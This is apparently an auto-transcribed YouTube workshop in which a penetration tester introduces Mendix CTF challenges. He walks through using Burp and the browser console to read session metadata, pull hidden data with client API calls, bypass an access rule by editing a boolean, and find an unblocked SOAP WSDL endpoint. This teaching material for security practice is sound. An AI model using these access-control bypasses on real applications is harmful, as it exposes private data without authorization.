YouTube Transcript: Amer Edition: Dirk van Veen, Hacking Basics Workshop
Skip watching entire videos - get the full transcript, search for keywords, and copy with one click.
Share:
Video Transcript
Video Summary
Summary
Core Theme
This content is an introductory workshop on hacking Mendix applications, focusing on the basics of Capture The Flag (CTF) challenges and how to approach them, particularly for beginners. It explains the fundamental architecture of Mendix applications from a hacker's perspective and introduces tools and strategies for identifying and exploiting vulnerabilities.
Mind Map
Click to expand
Click to explore the full interactive mind map • Zoom, pan, and navigate
[Music]
>> oh, yeah,
>> it's online.
>> Wait, wait.
Let's see. What's What's the link?
This one is
>> my current one ends in DHV8.
>> That was the same as the one earlier. >> Mhm.
>> Mhm.
>> I didn't particular.
>> You didn't change it.
>> No, no. In I haven't changed it yet.
>> That's okay because that's the correct link.
It's just this is from earlier.
>> it works.
Do I also have audio?
>> Yeah, you're live.
>> Oh my god. 10 seconds.
>> Have you have you also shared the screen?
screen? >> Yeah,
>> Yeah,
>> I've shared my screen.
>> I am live. I've got audio. I've got the
go ahead to start. All right. So,
So,
good day everyone and welcome to this
workshop, presentation,
whatever you would like to call it. I'm
going to be talking to you about um some
hacking basics. If you've never done a
CTF before, um, if at any point you have
any questions, just, uh, ask them. I've
got people sitting here who will, uh,
hopefully, uh, signal to me that there
are questions.
Um, my name is Derek. I am founder of
uh, the SUnit. We are a penetration
testing company in the Netherlands. I
started as a pentester around 2011
and I've been breaking Mendix now since
2015. So that's about 10 years. And um
aside from pentesting, I also do uh the
organization of CTFs. So um I'm the
original creator of this CDF that has
now grown from a small 40 participants
to um over 1500 worldwide.
and I'm here to talk to you about what
is a CTF, how do you actually get
started with hacking and to do that I
have to give a slight introduction
about Mandix Mendix as a system and how
that translates into how I see that as a hacker
hacker
because when you uh look at the MANX
documentation you will see this um this
image it is a um very famous image but
it is an image that I don't really like
and that is because it uh all of the
matrix components here they are stacked
vertically and that does not correspond
to reality. It suggested that it's one
monolithic structure. Well, in reality
there is a gap. There is a huge gap. And
if we visualize this gap in this way by
putting the client on the left and the
runtime on the right, we can um show
that this gap it's the big bad internet.
And if you realize that um there is a
big bad internet between the client side
and the runtime then all of a sudden it
becomes um more intuitive to realize
that this uh bit on the left the menx
client that's just your browser. It may
be a browser on your desktop it may be a
browser on your mobile phone but it is
just a browser and it is everything that
you model within that browser. So on the
left side we have your pages, you have
your nanoflows, we have your widgets and
we have a boatload of JavaScript and a
lot of information that your browser
needs to construct the communication
between the left side and the right.
The thing on the right side um they call
it the runtime but actually this is just
a web server. It's a web server just
like any other web application. And we
know that there is some communication
between the client and the server. So
there will be some API endpoints for
this client. Um
Um
but if we look at this image and we have
a browser on the left, we have a web
server on the right. Then that also
means that the um errors that we see
going between the client and the server,
this traffic, this is nothing other than HTTP.
HTTP.
Now, typically when I say this in a
workshop, people are nodding at me and
they're like, "Yeah, sounds logical,
sounds normal. We have a browser, we
have a web application,
the common language is typically HTTP.
So what?" Well, if you realize that um
all of the traffic between the left and
the right side is in HTTP, then that
means that actually the only thing that
your browser does. Everything you build
in this client side is just a fancy way
of constructing HP requests because
everything meaningful that your client
code does, anything that will have any
influence on your actual data, on your
actual logic will result in an HP request
request
and the rest is just fluff. It's just
fancy things and that um the fact that
all of this just leads to HP messages
means that if I want to hack your web
application, the only thing I as a
hacker have to do is create HTP
messages. And
if um I have a menx application that u
whose client is running on my computer
then I can see all of the HTP traffic
between my browser and my in the server
which means that any HP message that
your browser can send I as a hacker can
send as well. So I can pretty much do
anything that your browser can do. But
if you make um if you as a developer
choose to do some validation in a client
side component, if you want to do some
security, maybe you made something um
conditionally visible, I can ignore
anything that you do on that client
side. All I have to do as a hacker is
play with HTTP. So yes, I can do
anything your browser can, but I am not
restricted in the same way that you
think your brow uh your users may be. So
anything your browser can do, I can do better.
better.
In practice, this means that uh whereas
a normal user they will typically uh sit
behind the laptop, there will be
straight communication between the
browser and the manx application in my
uh setup that will not be the case.
Typically what I will do is I will run a
proxy where a proxy it's just a little
bit of software a little uh bit that
sits between my browser and the actual
website such that my browser talks to
the proxy and my proxy talks to the
website. Now the nice thing is if my
proxy is sitting in the middle then it
can do all kinds of fun things for me
because um what it can do is it can
decrypt all of the HTPS. It can create
very nice overviews for me as a hacker
to see all of the traffic passing
through the proxy. And what I can do is
I can use my proxy to manipulate traffic
and to generate traffic. So you will
typically see um me using a um browser
just to feed my proxy and then I'll use
my proxy to u interact with your web
application. So where a typical user
when they look at a web application they
may be looking at an image like this
just um a typical Mandix front end. The
majority of the time I will be looking
uh at something like this where I can
actually um see all of the requests that
my uh browser sends including um all of
the data that it sends and all of the
data that it gets back. Now
Now
with this in mind it is good to realize
that um when you have a menx application
and it runs in the browser then there is
a lot of javascript and menx wants uh
developers to be able to customize menx
applications. So they've also published
um a lot of uh nice JavaScript code and
whole JavaScript library and this
JavaScript code it has access to a lot
of information about the Mendix
application that is useful for me as a
hacker. Um
and most of this uh information is
directly available from your developer
tools from your JavaScript console if
you open it in a browser and just press
F12. So things that you um may think of
is there is a a little bit called um a
thing called session data which contains
some metadata where the metadata
contains information about all of the
entities that your current user has some
form of access to.
um not just the entity types but also
for each entity type it will have
information about the attributes
associated with that uh entity
and not just the attributes but also all
of the associations. So there is a lot
of information about your domain model
directly accessible from your browser.
In a similar way there's a lot of
information about um micrflows and
functionalities in your application.
They're also in that session data uh but
then not in the metadata but in the
micrflows where if you're uh if you're
using an older version of Mandix so if
you're using anything before Mandix 920
then the session data micrflow will
actually contain all of the micrflow
names all of the names of micrflows that
your current user has access to. Um
although that should not be a um
vulnerability in and of itself if you do
your access control properly if you
don't um have any superfluous roles in
the allowed roles. Manx has noticed that
a lot of developers are a little bit too
loose with assigning uh privileges. So
Manx did is in 9.20 they said we are
going to uh remove information about
mark names. We're going to substitute
that with randomly generated gibberish
called operation ids.
So um if you're in an older version of
menx there's a whole lot of information
about the micrflows. If you're uh above
920 information is still there but it is
a bit obiscated. Um
Um now
now
um the session micrflows it doesn't just
contain information about um the micros
but also a little bit about how
micrflows work under the hood. Not a
lot, but there is some um metadata in
the form of which parameters the
micrflow um expects
and which associations are used within
the micrflow to retrieve data through
associations because u say that a
micrflow needs to retrieve data over an
association from one of its input
objects then it may very well be that
your browser changed some of uh the data
of the associated object. So your
browser has to know that it has to send
that associated object as well.
Now this metadata it can be used to do
interactions with the back end and those
uh interactions usually go through uh
one single endpoint on uh the back end
server which is a /xas or the access endpoint
endpoint
and pretty much anything that you model
in um studio pro that has some backet
interaction will lead to some
interactions with this endpoint.
So, uh things that you will quite often
use um when you're doing when you're
hacking is you would like to retrieve
data from the client API from
JavaScript. There is a documented
function um called mx data.get which you
can use to retrieve data using XPath. If
you look under the hood that uh results
into a uh call retrieve by action in a
similar way uh there is functionality to
execute micrflows from the javascript
you would use mxod data. If you look
under the hood you would see that
there's uh some traffic going called
execute action. You can um manually edit
and uh commit data in JavaScript through
MSX data. Through burp um you will see
um there's a packet action commit and
there is a lot of useful things that you
can do through the client API and we
will see a few and how to uh use them
when we go through one of the exercises.
Now before I continue I do have to say
that um I as a hacker I use a lot of the
JavaScript I use a lot of burp but we do
know that a lot of uh first-time
participants they are not that uh well
verssed in JavaScript they have never
used Burp before but they do want to
start somewhere. So um what uh we what
we've seen is that a lot of um new
participants they like to go for a bit
of easy mode
um because you don't just uh you don't
have to use a proxy you can also use
browser plugins uh in particular there
is one browser plug-in that is used
quite often in the form of the uh cyphix
menx dev tools formerly the bisomeate
menx dev tools. And basically um what
that um this is it's just a um browser
plugin specifically for Chrome. You can
download it in the Chrome web store.
It's all legit.
And this um
this extension, this uh browser plug-in,
it uh provides a user interface, a nice
clickable um uh user interface with
which you can see all of the data that
your current user has access to. You can
use it to edit data. You can use to call
marker flows if you know the marker flow
name. All without ever having to do any
JavaScript programming yourself.
Um if you have this uh modu uh if you
have this plug-in installed then uh it
should load automatically if you are
visiting a um menx application that uses
the official uh marketplace module for
dev tools um because there's a module in
the marketplace which um basically
broadcasts saying hi uh I want civic
that uh is not the default. You have to
act actively install it in your
application. But that doesn't mean that
those are the only applications where
you can use this plug-in because it's
plug-in. It lives in your browser and
you can tell your browser to uh load it
whenever you like. And um the way that
you would do this um the easiest way is
through JavaScript.
I've um created a uh little uh paste
where you can uh load uh where you can
find the JavaScript. I promise you I did
not put in any backd doors. It's like
six lines of JavaScript code. Nothing
and if you do uh this then um you will
basically have that plug-in available in
uh the challenge environment. Now it is
easy mode. So um there are things that
are a lot easier but um this is not as
flexible as um JavaScript itself or as
Burp. So um there are some things that
you can do very easily but uh there are
some things that um this plug-in will
not be able to do. If you use this
plug-in, it will look like uh this where
you have a lot of information about uh
various entities within uh the database
and even your data in the database where
basically uh the only thing that this
plug-in does is it automates some of the
features that I just told you. So it
will automate going through the
metadata. it will automate retrieving
all uh data from the client API based on
what it sees in the metadata etc.
etc. Now
Now
moving on because this was just about
hacking in general but we are not
hacking in general. We are playing a
CTF. It's a game um a game with
particular goals and you can actually
use uh the goals of the game to be um to
improve your experience of the session.
So um one of the first things that um we
want to tell you is um
please choose your difficulty. Um if you
go to the scoreboard, if you log in, if
you go to the challenges, you will
notice that there are um three different
categories. Those categories uh
correspond with difficulty levels where
the um the first category the pizza
Mario application that is um aimed more
at beginner um CTFers uh we estimate
that those challenges are easy to medium difficulty
difficulty
and we've uh tried to make this beginner
friendly. So many of the challenges in
this app are doable from the browser or
maybe even completely from the CX dev tools.
tools.
Um, we built the application on uh a
menx uh version prior to 9.20. So you
don't have to worry about all of the
offiscation that I mentioned before.
And because this is intended to be the
easier level, this is also the um
application where you are more likely to
get useful hints from the coaches.
One level up from the beginners is the
advanced. That's the patient portal
which we um guesstimate uh would be
medium to hard and this is really a step
up uh from the beginners. So um if you
look at it you will notice it is running
mandx 1024. So you no longer have access
to micrflow names. You will have to deal
with all of the obfiscation that I
mentioned before.
Um, but it gets a bit worse because we
thought uh what would be more annoying
or uh more funny than enabling strict
mode. And the thing that strict mode
mode does is it disables a lot of the uh
features that would normally be
available from JavaScript. So people
that have trained uh previous years on
their JavaScript skills, they will have
to start developing an additional skill set.
This also means that uh if you want to
play these challenges, you will likely
have to use Burp, you will likely have
to use JavaScript, you will not be able
to do everything just from the CIX dev
tools. And because these challenges are
more difficult, typically you will also
receive fewer hints than um for the
beginner uh challenges.
Now there is an additional uh level
that's the one that we call magic. And
basically uh the magic category is the
category where we say you know what good
luck um we're not going to tell you
anything. These are um
challenges that are intended to be uh difficult
difficult
and um
you will not be guided here. So this
really is aimed at those that are
already familiar with the advanced and
want an additional challenge.
So if you say, "Oh, this is my first
menx CTF." start with the beginner
challenges and from there move um
upwards through the uh through the
difficulty levels. Now
Now
when I mention difficulty levels, you do
have to um realize that as challenge
makers, we have to estimate what the
audience will find difficult and what
they will find easy and that estimate is
not always accurate. Um to compensate
for that we use um dynamic scoring which
means that um points will go down the uh
more a challenge uh gets solved.
This in turn means that if you find
yourself getting stuck and if you don't
know where to start, a very safe uh
route would be to look at the
scoreboard, go for the challenge with
the least amount of points because
apparently that's the one that all of
your competitors thinks uh think are the
easiest and then work your way up from
uh lower to higher number of points. Um
Um
if you do this then um if you're doing a
channel with lower points you can also
um request more hints from coaches. So
uh don't shy away from getting into
contact with one of the coaches either
the coach on site if you're on a
satellite location or one of the coaches online.
online.
And because scores evolve over time, uh
we advise to periodically check whether
um the uh scores are still the same or
whether there's a new challenge which um
has um gotten a lot of uh solves because
that would be a good indicator for want
to go for next.
Now if you do sort uh the challenges by
points then you may uh encounter
situations where one of the advanced
challenges has more solves than one of
the um beginner challenges that is
normal. So, uh if there is an uh
so-called advanced challenge with a low
score, um that is an indicator that it
would be um a good uh point to continue
before moving on to the high point
Then you have a strategy on which
challenges to solve. Now, how to go
about solving an individual challenge?
Um if you want to think about that then
it's good to realize every challenge has
a goal where of course the goal is to
find the the flag that we've hidden
somewhere but if you realize this goal
then um
you can also uh start thinking about
okay where can flags be hidden and
typically there are not that many
different locations that we as
organizers can hide flags. So um things
that you should um think about um when
searching for flags is um flags stored
in uh uh within um one of the entities.
Maybe there is an attribute that you
have read access on that has a flag or
maybe there is an attribute that you
don't have read access to yet but that
you do have um methods for of granting
yourself uh read access. that would
typically be a nice place for us uh to
hide a flag.
In a similar way, um the moment that a
flag is related to application logic, we
will frequently hide the flag within a
micrflow. Maybe a micrflow that performs
a particular validations so that when
the micrflow detects that you bypassed a
particular uh security measure that it
will uh all of a sudden produce a flag.
And um we typically like to hide flags
in UI components. So maybe a page, maybe
a nanoflow, something that uh runs
within your browser, but that uh may not
be immediately visible if you just open
Then if you look at the scoreboard, you
will notice that challenges have titles
and challenges have descriptions.
As challenge makers, we really like to
give you small hints, small nudges um on
how to solve the challenge because um
the um the fun part for us is not to
have you uh um go wild about oh I don't
know what I have to do. The fun part for
us is when you actually know what to do,
but uh uh to make the how the difficult part.
part.
So um when you are reading a challenge
uh look for keywords that relate to
particular parts of the application.
Keywords that give hints on where in the
application you might find the flag. Um
sometimes we will just explicitly tell
you in a challenge, hey please do X. Um,
if we're talking about pizza, maybe
we'll tell you, okay, we want you to buy
a million pizzas or maybe we want you to
get a free pizza or maybe we want you to
send a pizza to outer space where the uh
instruction in uh the challenge will
lead to a flag if you somehow manage to
fulfill the condition mentioned there. And
And
if you do this and even uh when looking
at the title and description, you don't
have any idea on what the uh goal of the
challenge is. Don't rush to the
application. Don't start blindly uh
rumaging around. Um but discuss with
your teammates, brainstorm, look at what
they think that the goal would be
because uh the chance of success is a
lot higher if you have a good idea of
the goal of the challenge. If your uh
team members also have no idea what to
do, try to brainstorm with a coach. Um
because um we will typically help you at
least realize the goal.
Then when you do uh hack, when you do
have uh an idea of what to do, um it is
very easy to um accidentally get stuck
uh in tunnel vision where you're looking
5 minutes at a thing, 10 minutes at a
thing, no progress, no progress, and
five hours later you still made no
progress uh but just created a lot more frustration.
frustration.
If you notice that you get stuck, um
there are things to avoid tunnel vision.
One of the things is um try to recognize
when you are mainly looking at your
application through the browser or
mainly through the CIX tool or ma mainly
through burp. uh so that you can uh
force yourself to alternate between the
various uh viewpoints because differing
viewpoints will trigger uh different
thoughts in your brain and will um uh
may help you uh to create new
connections in your thinking and to draw
new conclusions.
Um the second you have team me team
members use them brainstorm with them
not only about the goal but also about
um ideas you have about reaching the
goals. Uh maybe brainstorm about
roadblocks that you see and uh ways that
you do or do not see to get around the
roadblocks to see uh just to see whether
your uh teammates agree with you or
maybe they see something else entirely. Then
Then
if you are stuck with a uh one of the
challenge, we have over 25 challenges.
There are plenty of other challenges to
look at. You will um find that if you
switch your attention to another
challenge um it may be uh uh turn out to
be an easier one and it may help you uh
progress along.
And if even that doesn't work, don't
forget to take a break. our brains um
they process information best when we're
not actively thinking about things. Um
so go um have a drink, talk to other
people, go outside, have a breath of
fresh air. Um actually one of the best
places to hack is the shower because you
cannot actually actively look at your
screen. You're just forced to relax and
let your brain wander around. And that
is typically when the most genius ideas
um pop up.
Finally, if all else fails, grab a
coach, ask them to be a rubber duck, ask
them for hints. This is intended to be a
learning experience.
And finally, um, during the opening, um,
I'm not sure if it was mentioned in the
American opening, but in the European
opening, um, there was a question about
AI. Um, and we do, um, um, recognize
that AI is being used a lot more in
security testing and in defense. And the
sad thing about AI is AI has things
wrong a lot. So you cannot trust AI to
do something well. Um or actually you
cannot trust AI to come up with the
right answer. But AI is a very good
brainstorming partner. So um if you have
no idea what the challenge means, ask
Czech GPT, hey I'm playing a CDF, this
is the hints that I get. What am I
supposed to do? And chances are CH GPT
will come with a lot of ideas, most of
which are garbage, but uh some of which
may also trigger you into thinking in
the correct direction.
Now, having said all that, let's look at
a few practical examples.
And to do that, um I'm going to look at
some challenges that we did a few years
ago. Uh starting with this one where um
this is taken from the scoreboard and we
see the challenge uh description survey
logs. There is a rumor going around that
the devs are collecting and selling
secret log data within the survey app.
Can you find out if this rumor is true?
Here is a link to the survey application.
application.
Now um the link you see here it still
works. So, um I will be doing this live.
Uh feel free to also join us um while I
uh to hack along while I'm showcasing things.
things.
But when I see this um I notice some
things. I notice that in the title it
says logs and I notice that in the
description I see secret log data. So I
see the title word being repeated. This
raises a flag. this may be one of the
keywords that I have to pay attention
to. So, um my goal is very likely to
find data related to logs. Now, there's
a lot of places that data related to
logs can be u hidden. So, I'm keeping my
options open. I'm going to think okay I
may have to find entities that are
related to logs or maybe um there is an
entity that has a attribute that is uh
related to logs or maybe somewhere in
the application there is a micrflow that
has uh is related to logs
but when I'm going to be exploring this
application I'm going to be actively
looking for log data now
I'm going to do this uh exercise um
using Burp. So I have my uh Burp here. I
have the professional edition. If you
have the community edition, that is
Relatively soon uh Burp will open. we
have a temporary project and within Burp
we have this button and this button what
it does is it starts the builtin version
of Chrome
um that is preconfigured to talk to Burp
as a proxy so it is preconfigured to
send its traffic to the proxy it has
been configured with the uh HPS
certificates to allow decryption and
what I'm going to do here is I am going
to go to my Mendix CTF F 2022-2.andixcloud.com
and as the page is loading
I have my burp. I see all kinds of
things happening and one of the things
that are happening is there is this tab
called proxy where all of uh a lot of um
things may be a little slower because
I'm wondering why I'm not seeing the
because we should be seeing the application.
We're not getting any error messages. We are
we were very proud that the live stream
Are you going to tell me that the
now the demo effect is going to start
I'm getting a signal that everything's
going well. However, I am not actually
seeing the web application at the moment.
Otherwise, I will have to open this in
another browser, which should not be a problem
is a little sad if I wanted to showcase
Burp. Oh well.
Here we have the same application, same URL.
And we'll just let the one on the
background do its thing. And if I press F12,
F12,
then I can open the developer tools. And
here um we will have access to this mx session
session
session data. You will also notice that
uh because this is in the JavaScript
console there is um tab completion. So I
don't have to do any typos. Session data
dot metadata and I can use this to uh
investigate all of the entities within
this application. So if I press enter
you will see here bracket and then a
comma separated list of things. The
brackets means that this is a list and
this uh triangle here uh means that we
can expand the list by clicking on the
triangle. So I click on it
and now I see a very nice list
of items
where um we can see um item number zero.
It has a few uh key value pairs. Key
value pair called attributes properties
object type where we see object type
system do user. So this uh item
represents the uh user entity from the
system module. We see survey company
survey.s surervey. We also see a survey.log
survey.log entity
entity
and this is where um I can combine
the information from the challenge with
the information that I see on my screen.
I knew that I was looking for log
related data. I here see that there is
apparently an entity that seems to be
related to logs. I can expand this
entity. It has information about
attributes. I can expand the attributes
and here I can see that my user uh may
have access in this case read only
access on both the date of a day time of
the log entry the source of the log and
the actual log message. Now going back
to the challenge uh we had to find
secret log data so that um could
correspond to the log messages here in
the app. Now if I want to retrieve that
data um I have to do some uh JavaScript
magic and the nice thing is Mandix
has a lot of documentation
about its magic. So if you Google for
the MENX flight API, you'll see that the
first link is a nice page about the
client API where um
sadly Mandx is slowly reducing the
capabilities of the client API. But
luckily this is an older version. We can
actually check MX version. This is built
on 9.19. So that's before 9.20.
So we can use the legacy APIs.
we open the documentation for the dojo
uh API and let's make this a little bit smaller
smaller
and within this documentation you will
notice that there is a concept of name
spaces where the data name space
contains a lot of functionalities
related to interactions with the
runtime. Now one of the interactions
here is mx.data.get get which as the
documentation says retrieves MX objects
from the runtime
um it says it can do it based on goods
microflow or XPath now I don't know
anything about markflows I don't know
anything about goods but as a menx
developer I do know about xpath
um so what I'm going to do is I'm going
to look at the uh example code I'm going
to look for an example of mid data get
with xpath
And here I see
I
paste it in my console. You may get a
message warning you that uh pasting
JavaScript code is very very dangerous.
That is 100% true. One of um my goals
when I'm hacking an application is to
see if I can execute my JavaScript in
the browser of another user. Um
thankfully the um JavaScript here in the
MEX documentation it's benign. We don't
have to worry about that. So if you get
a message that says um please type allow
pasting then all you would have to do is
to type allow pasting
and hit enter.
And then you should be able to um paste
the code. If I look at the code, we are
currently saying we would like to
retrieve data from the client API
uh based on this Xpath query. Now we are
not interested in system of user. We
So now we we can tell the um back end we
would like to press all survey.log
objects. And what you will notice is
that there is a second key value pair
here called back.
Now the way that the MAX JavaScript API
works is um MX.get does not know
beforehand how long a particular
database query will take whether it's a
very simple query whether it's a very
complicated query whether there's a lot
of data to be returned. So um what the
MX client library has said is anytime we
do backend interactions we're going to
do those in the background. We are uh
not going to wait for the function to
complete. We're just going to do this in
the background so that the rest of the
JavaScript code can keep running. But
that also means that the result of this
query will not be immediately available
on my console.
Instead what menx has done is they say
if you provide a um key value pair
called callback then whichever function
you uh put here this will receive the
output of uh the back end interaction.
So if we were to find any logs they
would be here. Let's call these logs
instead of objs because I cannot
pronounce objs.
And the most simple thing that you can
do with this is you can output
the logs to the console. So I do
console.info and then between
parentheses I put logs.
I press enter
and all of a sudden I get uh I first get
a response saying undefined. That is
because everything is happening on the
background. So there's no immediate
result. But uh really soon after the
undefined, I get a message, one of those
brackets indicating this is a list. I
expand the list. There's one item. I
expand the item. We see it is a survey.log.
survey.log.
And now it not only has metadata, it
also has JSON data. And the JSON data
will contain the actual data that was in
the database. So I can open this. I can
go to the attributes.
I see a daytime. I see a log source and
I see a very recognizable flag
indicating that I have now solved the
challenge. All I now have to do is I
have to copy this value, go to the
scoreboard, enter it here and press
submit. And if I didn't make any copy
paste errors, I should be receiving points.
Now I did this using JavaScript.
Um JavaScript is not the only way in
which you can do this. And interestingly
enough now uh my
Chrome this is the built-in uh browser
from uh
from Burp that all of a sudden started
working. So we can actually also see
what happens when we execute this
JavaScript. So let's also do this here.
Here you will see I do get the message
saying, "Oh, be careful. Please type
allow pasting." So I type allow pasting.
Now I can paste. I hit enter. I get the
same result. If I now open burp, I will
there was uh a post to the /xas endpoint
that I mentioned the access endpoint.
um the action that we did retrieve by
Xpath. And here we see our nice XPath
in the um response.
We see that we have one result and here
we see the actual log object with our flag.
flag.
Now I mentioned easy mode. What h um
what would I have done if I didn't have
Burp? If I didn't know anything about
JavaScript? If I don't trust myself in
copy pasting JavaScript code and uh
correctly editing it, I could have used
the CIX um
browser plugin. To do that, you would
have to go to um you would have to add
the extension. So, we can go to the
extension manager in Chrome. Go to the
Here we can search
and immediately it already finds what we need.
I press a button add to Chrome.
All right, it has been added.
if um the um plug-in is loaded on a
page, I should be able to open it either
using altB or commandB depending on
whether I'm on a Windows machine or a
Mac. I'm using a Mac, so for me it will be
be
uh commandB.
If I try to press commandB, uh if I want
to do this, I would have to do it uh
after clicking somewhere here on the page.
Currently, it doesn't do anything. I uh
I have to actively load it. So, I take
the JavaScript code from um the paste
link, I put it here, and the only thing
that this uh JavaScript code does is it
loads the JavaScript from the Chrome
extension and adds it to the page. It
loads the styling from the um
plug-in and adds to the page. So if I
and now I press
they say command B but for me it's
option B. I now see the CEX dev tools
where um
we can see information about our current
state but also information about all of
the access we have to data in the
database. And here we could have seen,
oh, there is apparently an entity
survey. I could have clicked on it.
And here I already see uh
information about the survey.log. I see
my flag. I can copy paste it and solve
the challenge. Now,
Now,
not every challenge is this easy. Um,
not every challenge will have just one
step. There will be challenge that are
uh more difficult or uh uh require
steps. Here we have one called secret
time. Uh it's always fun to poke around
in applications to see if they
accidentally expose juicy information
like passwords, health information or
company secrets. Can you check what you
can find if you give the survey app a
good shake?
Now here
I see something related to secrets. I
see passwords which I know are secrets.
I see something called company secrets.
So I make the assumption that my goal is
to find rel data related to either
passwords or to company secrets.
And um once again um this may be um
in uh entities where if it's in an
entity these are typically attributes.
So I'm just going to focus on attributes.
attributes.
Uh I could still look at markflows as well.
well.
But let's start
with the data. And we can actually do
this one uh straight from the cex tool
because um
if we want to find passwords or company
secrets, passwords are typically related
to users. Company secrets are related to
companies. And I do see in this custom
survey uh module that there is an entity
survey company. I can click on it and I
see apparently there is a um attribute
called company secret. However, I don't
have read access on company secret for
this particular company. Now, the fact
that I can see company secret as an
attribute means that there may be cases
where I do have access to company
secret. So, I can start to think about
how could I get access to company secret
or how could they have um prevented me
uh how can they actively prevent me from
this access. And typically if I do see
this column but I don't see the value
this means that there is an access rule
within the domain model that gives me
read access only under a particular
expath constraint.
Now I was still thinking about
passwords. So I can also look at user
related things. We know that you cannot
change system of user. There is no user
specific thing here in the survey. there
is an administration.
If I click on administration.ac account
and I look at the various uh attributes,
I do see that there is a boolean can see
company secret and currently this um
administrative account has that boolean
set to false. Now I can imagine that
maybe the access to um the read access
on company secret uses this uh cany
company secret as part of its expath
constraint. I can test that by just
editing this boolean saying oh I don't
want it to be false. I want it to be true.
true.
Commit. I get a nice message saying the
object was committed.
and now apparently I do have access. So
now I used my right access on a boolean
to manipulate the X path for survey company.
company.
Now there are a lot of other things uh
that you can uh encounter. Um
Um
but I think we are almost out of time.
I'm also going to look across.
We have 10 more minutes, five more minutes.
minutes. Um
Um
then I will showcase one final example.
Uh here we have one cleanliness.
Developers will always remain a mystery
to me. Every time I walk past their
lair, they seem to be talking about
bathing and cleaning agents. It's always
soap this and soap that. You'd think
that by now they'd be smelling like
roses. Can you figure out what their
hype is all about? Now, this description
is a lot more cryptic. It does not
really mention anything about particular
data or particular functionality. But we
recurring mentions of soap. And
And
this um can be a keyword because um
if you think soap, soap is not just a
thing that you can wash with. Soap is
also one of the ways in which you can
publish um integrations in Mendix. So
maybe whoever wrote this uh
misunderstood the conversation and the
developers were actually talking about
SOAP services. So my immediate um uh
idea is maybe I have to find and call a
SOAP service
and if not I have no idea what to do. So
what could I do? You could go to uh
Google and you can search for okay
and you can just go to the um documentation
documentation
and apparently there is a way to publish
using SOAP. And here we see if we just
go through the documentation
that uh oh
when running studio pro projects publish
web services documentation
the address
would be /wsd doc. So apparently there
may be some documentation on a URLs doc.
doc.
I can
try to see if that URL is accessible.
Now, nor oh, normally
uh when you deploy to the Manx cloud,
Manx automatically disables this
endpoint or at least it blocks it. But
we see in our uh application, this is
not blocked. We have information about
where this
um about the web service description
language which is basically a file with
metadata about the SOAP services.
Uh, we can also see example requests for how
how
a um legitimate request to the SOAP
service would look. And I can now use
this to actually send a SOAP uh message
I hope that this uh little introduction
into CTFs um helps you with finding your
way around um the the challenges.
If there are any questions um do feel
free to ask. I see that there's at least one
one [Music]
[Music] >> remote
>> remote
as 20 minutes ago. Why is this possible?
Why are this system related objects
available in public scope?
>> So apparently there was a question
already 20 minutes ago. Uh oh, we should
pay closer attention about why
particular data is uh so readily
available. um uh specifically mentioning
uh system data. So I think um
that what uh they were talking about is
likely the uh session data metadata or
maybe the uh objects in the system module.
module.
But um what you should realize is that
Mandix is a platform and the user
interface has to do a lot with um
objects that uh come uh come back from
the runtime. So at some point it will
have to know
um a particular uh attribute. Is that
going to be a string? Is that going to
be a number? Is that going to be a
daytime? Is that going to be a reference
to another um entity?
So at some point a lot of this
information will need to be exposed to
the client. Um now
now
of course u menx could say okay we're
going to only send things on the fly but
um menx also wants to be flexible for
developers. Manx wants to able to uh
wants to enable developers to write
arbitrary JavaScript plugins and Manx
has no control over what your JavaScript
plugins want to do, what kind of
entities they may uh come in contact
with. So what men has said is um the
moment that you uh choose to give access
on a particular entity
we will inform um the browser of that
entity's existence of that entity's attributes because if you grant access
attributes because if you grant access on an entity apparently you intend for
on an entity apparently you intend for that entity at some point to be exposed
that entity at some point to be exposed to the browser. So it's good to realize
to the browser. So it's good to realize that um when we look at this session uh
that um when we look at this session uh MX session
MX session MX
session session data metadata that this is not a list of all entities
that this is not a list of all entities in your application just the application
in your application just the application that your user actively has some form of
that your user actively has some form of access to.
access to. Um and yes uh if you look at the system
Um and yes uh if you look at the system module each user by default has
module each user by default has particular uh access to their own system
particular uh access to their own system user object and as such to particular
user object and as such to particular attributes within that um object and as
attributes within that um object and as such information about those attributes
such information about those attributes or at least the existence and the type
or at least the existence and the type of those attributes is communicated back
of those attributes is communicated back to the client.
to the client. I hope that answered the question. I
I hope that answered the question. I will give uh a few seconds for all of
will give uh a few seconds for all of the time delays
the time delays in case you have any follow-ups.
I'm getting the signal that there are no additional questions. So with that I am
additional questions. So with that I am going to uh stop the stream. I hope you
going to uh stop the stream. I hope you are all feel uh well prepared to start
are all feel uh well prepared to start hacking at least the beginner
hacking at least the beginner challenges.
challenges. If you do uh have additional questions
If you do uh have additional questions if you ever get stuck uh reach out to
if you ever get stuck uh reach out to your coaches. Um they will gladly help
your coaches. Um they will gladly help you. Hope you have fun and um
you. Hope you have fun and um hope to see you at the next workshop. I
hope to see you at the next workshop. I will be giving a workshop tomorrow at 10
will be giving a workshop tomorrow at 10 a.m. Central European time uh about the
a.m. Central European time uh about the top 10 uh medics vulnerabilities.
top 10 uh medics vulnerabilities. If you are interested in that as well, I
If you are interested in that as well, I hope to see you then.
hope to see you then. Otherwise,
Otherwise, see you in the future. Bye-bye.
Click on any text or timestamp to jump to that moment in the video
Share:
Most transcripts ready in under 5 seconds
One-Click Copy125+ LanguagesSearch ContentJump to Timestamps
Paste YouTube URL
Enter any YouTube video link to get the full transcript
Transcript Extraction Form
Most transcripts ready in under 5 seconds
Get Our Chrome Extension
Get transcripts instantly without leaving YouTube. Install our Chrome extension for one-click access to any video's transcript directly on the watch page.
